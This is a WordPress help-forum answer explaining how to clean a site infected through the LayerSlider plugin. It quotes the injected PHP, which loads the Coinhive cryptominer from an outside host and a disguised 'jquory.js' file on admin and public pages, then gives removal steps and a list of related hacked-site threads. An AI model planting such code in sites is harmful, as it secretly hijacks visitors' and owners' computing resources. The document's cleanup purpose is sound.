I found the problem..
Answering for others who might have gotten this…
There is this code embedded in one of the plugins
function enqueue_my_scripts() {
wp_enqueue_script( 'wp-internal', 'https://coinhive.com/lib/coinhive.min.js', false, false, true );
wp_enqueue_script( 'wp-backend', plugins_url() . '/LayerSlider/assets/js/jquory.js', false, false, true );
}
add_action( 'admin_enqueue_scripts', 'enqueue_my_scripts' );
add_action( 'wp_enqueue_scripts', 'enqueue_my_scripts' );
And this javascript file Jquory.js.
Just remove the code above and the js file. The problem will be gone.
Cheers.
Related Posts:
- What’s the effect if this malware if infected your WP?
- Malware on site [closed]
- How to find the backdoor of the hack
- My wordpress site was hacked – is my htaccess file compromised?
- My WordPress Blog sends malicious traffic to other sites [closed]
- Hacked WordPress website, as notified by Google Search Console, what to do? [closed]
- How was my WP site hacked [closed]
- If a WP install is hacked, can it spread to other domains on a server?
- Find and Replace text in the entire table using a MySQL query
- Is it a good idea to rename the “index.php” in “wp-admin” folder to avoid being hacked?
- How to fight this wp-info.php exploit? [closed]
- Prevent Hacking of WordPress Site [closed]
- Suspicious URLs being loaded after hack and restore
- Server hacked: correct contents of wp-uploads directory? [closed]
- Site hacked with malware [closed]
- Copy wordpress website pages and content
- How do I know if my WP Theme is using infamous TimThumb?
- Spam pages hack? [closed]
- Check for malicious code?
- Why would a hacker add this code to each post, and how to do mass cleanup?
- Is the current spate of hacks related to the recent security fix?
- I have removed the malware from our website however, when I tried again to search the word from Google it is still there [closed]
- Have I been hacked? Mysterious code at the top of theme files [closed]
- Strange codes in my wordpress site and my website is running too slow [closed]
- Spam Content Serving from old cached version of site?
- How to solve wordpress redirection (no malware was found)?
- Help determining if the following are legitimate files
- My blog was hacked? WP posting random posts
- Have I been hacked – getting new site setup email for 8 localhost wordpress sites
- Site Hacked – WordPress Divi Site – Cannot find where to fix the issue? [closed]
- Where I can find a list of WordPress security risks?
- looking for indoxploit hack solution [closed]
- Why functions.php file automatically empty?
- Bruteforce attack from 127.0.0.1?
- WordPress installer attack
- Why wordpress is hitting another url
- Where do hackers usually run their hacking script? [closed]
- Malicious Code in Index.php WordPress [closed]
- WP Site Hacked, Serp Google Spam [closed]
- My site appears to be hacked [closed]
- WordPress Redirect Hack
- Strings of malicious code to look for after a hack
- Hacked/cloaked sitemap [closed]
- Verifying that I have fully removed a WordPress hack?
- If a hacker changed the blog_charset to UTF-7 does that make WordPress vulnerable to further attacks?
- Scanning Database for malicious Data
- How Attackers write script into my php files?
- Is this a hacking script in function.php?
- Websites defaced by uploading script using theme editor
- How can I find security hole in my wordpress site?
- Has anyone experience w/ WordPress (MultiSite) hidden users (possibly hacked)?
- Restrict access to xmlrpc.php
- How to prevent bot or someone to modify any file automatically?
- How do i disable/disallow and tags in TinyMCE?
- hSite has no css on mobile [closed]
- How to mass delete one line from all posts after site hack
- Unfamiliar query string in Google Search Console URL not found
- Strange gibberish JavaScript in Editor – site hacked?
- wp-config.php modified?
- Suspicious Files
- Invisible spam post in backend
- Files automatically added
- You appear to have already installed WordPress. To reinstall please clear your old database tables first
- sitemap contains weird links and does not contain my pages [closed]
- Malware script in database post table only? [closed]
- New user is assigned 2 roles: customer and superadmin
- Hacked WordPress website /Homepage redirect [closed]
- WordPress Footer Missing After Website Hack
- wp-admin folder removed by hacker [closed]
- What is this code in my theme’s footer.php causing chmod permission warnings? [closed]
- My WordPress website was hacked [closed]
- Hack-Proof OR Security in WordPress — is it real?
- How to find exploited wordpress plugin [closed]
- Is wp-app.php or wp-apps.php needed for WordPress?
- What can I do when an outside party hacks into my weblog and changes my display name?
- Troll the hackers by redirecting them
- Any known bugs that could cause disappearance of the wp_users table?
- On new server, site got hacked, permissions a bit strange? Please help
- malware undetectable by multiple scans
- WordPress Hacked 5.5 admin-ajax.php [closed]
- Is there a simple way to set wordpress site files back to out of the box?
- Can’t access htaccess [closed]
- Replace domain in database
- Admin user lacks admin permissions after hack and can’t reinstate
- Website Got Hacked – Fixed – Now Cannot Activate Theme
- Username was changed to “admin”
- WordPress disable direct access of files in WordPress installation path
- Am receiving more than thousand mails in single day from ‘[email protected]’ continuously
- Is this a hack? WordPress Usernames of every website we have changed into one single name automatically?
- Should I prevent access to .htaccess and wp-config.php files?
- Javascript Injection on my WordPress Site
- After being hacked Fatal error: Call to undefined function get_header() in 404.php on line 1
- Could a user account with a stolen password compromised entire WP site?
- how to find the way they hacked my WP site
- suspicious boolean.php file in wp web root [closed]
- How to remove content from hacked pages? [closed]
- My WP site and password was hacked, what to do? [closed]
- My WordPress site hacked with unwanted popups [closed]
- Should WordPress Add Options to Enhance Security or Leave it to plugin developers? [closed]
- WordPress Hacks/Defacing [closed]